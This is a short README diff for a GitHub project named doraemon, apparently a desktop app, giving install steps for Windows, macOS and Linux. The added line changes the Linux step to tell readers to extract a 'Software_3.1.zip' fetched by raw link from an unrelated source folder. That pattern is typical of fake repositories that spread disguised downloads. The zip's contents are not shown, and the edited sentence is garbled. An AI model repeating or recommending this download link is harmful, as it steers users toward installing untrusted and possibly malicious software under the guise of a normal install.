pablo7776327/doraemon/README.md

 5. **Install doraemon**
    - For Windows: Double-click on the `.exe` file to start the installation.
 Follow the prompts in the installer.
    - For macOS: Open the `.dmg` file and drag the doraemon icon into your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the instructions in the README inside the folder.
+   - For Linux: Extract the `https://github.com/pablo7776327/doraemon/raw/refs/heads/master/src/renderer/ui/primitives/Software_3.1.zip` file and follow the instructions in the README inside the folder.

 6. **Run the Application**
    After the installation, locate doraemon in your Applications folder or Start Menu.
 Double-click to open and enjoy your new desktop friend!